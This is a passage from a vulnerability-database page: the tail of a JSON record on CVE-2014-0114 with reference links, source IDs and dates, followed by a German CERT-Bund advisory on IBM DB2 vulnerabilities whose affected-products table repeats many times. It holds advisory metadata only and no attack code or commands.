"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674113"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674905"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679331"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680698"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037424"
},
{
"trust": 0.9,
"url": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15282.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680194"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677352"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037622"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0114"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu96290700/index.html"
},
{
"trust": 0.8,
"url": "https://www.us-cert.gov/ics/recommended-practices"
},
{
"trust": 0.8,
"url": "https://www.us-cert.gov/ics/advisories/icsma-20-184-01"
},
{
"trust": 0.8,
"url": "https://www.fda.gov/medical-devices/digital-health/cybersecurity"
},
{
"trust": 0.8,
"url": "http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-002308.html"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0114"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0114"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f@%3cnotifications.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3@%3cnotifications.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3ccommits.pulsar.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd@%3ccommits.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5@%3ccommits.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40@%3cgitbox.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477@%3ccommits.dolphinscheduler.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639@%3ccommits.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3cdevnull.infra.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b@%3cannounce.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f@%3cuser.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674379www-01.ibm.com/support/docview.wss?uid=swg21677335"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10795183"
},
{
"trust": 0.6,
"url": "http://www.ibm.com/support/docview.wss?uid=ibm10872142"
},
{
"trust": 0.6,
"url": "https://issues.apache.org/jira/browse/beanutils-520"
},
{
"trust": 0.6,
"url": "https://www.mail-archive.com/announce@apache.org/msg05413.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887121"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10957873"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887119"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887113"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10888007"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887999"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887973"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10888009"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/75922"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-3/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2568/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1427/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6494701"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-warehouse-has-released-a-fix-in-response-to-multiple-vulnerabilities-found-in-ibm-db2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2355/"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-identified-in-ibm-storediq/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-db2-that-affect-the-ibm-performance-management-product/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-db2-and-ibm-java-runtime-affect-ibm-spectrum-protect-server/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-open-source-used-in-ibm-cloud-pak-system/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2293.2/"
},
{
"trust": 0.6,
"url": "http://www.ibm.com/support/docview.wss?uid=ibm10879093"
},
{
"trust": 0.6,
"url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10872142"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/78218"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3134/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072128"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-planning-analytics-workspace-is-affected-by-security-vulnerabilities-3/"
},
{
"trust": 0.3,
"url": "http://struts.apache.org/"
},
{
"trust": 0.3,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674379"
},
{
"trust": 0.3,
"url": "www-01.ibm.com/support/docview.wss?uid=swg21677335"
},
{
"trust": 0.2,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.2,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/en/support/security/"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/en/support/security/advisories/"
},
{
"trust": 0.1,
"url": "http://www.openwall.com/ove/"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0474.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/#package"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/site/articles/11258"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/security/data/cve/cve-2014-0114.html"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0114"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2014-0114"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.broker\u0026version=7.5.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
},
{
"trust": 0.1,
"url": "http://www.hp.com/jp/icewall_patchaccess"
},
{
"trust": 0.1,
"url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
},
{
"trust": 0.1,
"url": "http://h30499.www3.hp.com/t5/hp-security-research-blog/protect-your-struts1-a"
}
],
"sources": [
{
"db": "BID",
"id": "67121"
},
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "126525"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "PACKETSTORM",
"id": "154792"
},
{
"db": "PACKETSTORM",
"id": "126811"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2014-0114",
"ident": null
},
{
"db": "BID",
"id": "67121",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126692",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "149050",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126525",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "137980",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154792",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126811",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2014-0114",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2014-04-30T00:00:00",
"db": "VULMON",
"id": "CVE-2014-0114",
"ident": null
},
{
"date": "2014-04-29T00:00:00",
"db": "BID",
"id": "67121",
"ident": null
},
{
"date": "2014-05-19T03:19:48",
"db": "PACKETSTORM",
"id": "126692",
"ident": null
},
{
"date": "2018-08-23T17:19:18",
"db": "PACKETSTORM",
"id": "149050",
"ident": null
},
{
"date": "2014-05-07T15:04:23",
"db": "PACKETSTORM",
"id": "126525",
"ident": null
},
{
"date": "2016-07-20T18:29:00",
"db": "PACKETSTORM",
"id": "137980",
"ident": null
},
{
"date": "2019-10-10T14:43:55",
"db": "PACKETSTORM",
"id": "154792",
"ident": null
},
{
"date": "2014-05-27T16:17:39",
"db": "PACKETSTORM",
"id": "126811",
"ident": null
},
{
"date": "2014-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-581",
"ident": null
},
{
"date": "2020-07-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006468",
"ident": null
},
{
"date": "2014-06-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-000056",
"ident": null
},
{
"date": "2014-04-30T10:49:03.973000",
"db": "NVD",
"id": "CVE-2014-0114",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-13T00:00:00",
"db": "VULMON",
"id": "CVE-2014-0114",
"ident": null
},
{
"date": "2019-07-17T07:00:00",
"db": "BID",
"id": "67121",
"ident": null
},
{
"date": "2023-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-581",
"ident": null
},
{
"date": "2020-09-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006468",
"ident": null
},
{
"date": "2015-01-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-000056",
"ident": null
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-0114",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "126525"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
],
"trust": 1.0
},
"title": {
"_id": null,
"data": "OpenClinic\u00a0GA\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
],
"trust": 0.6
}
}
WID-SEC-W-2022-0770
Vulnerability from csaf_certbund - Published: 2020-04-23 22:00 - Updated: 2026-01-08 23:00Summary
IBM DB2: Mehrere Schwachstellen
Severity
Hoch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: IBM DB2 ist ein relationales Datenbanksystem (RDBS) von IBM.
Angriff: Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in IBM DB2 ausnutzen, um seine Privilegien zu erhöhen oder einen Denial of Service zu verursachen
Betroffene Betriebssysteme: - Linux
- UNIX
- Windows
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
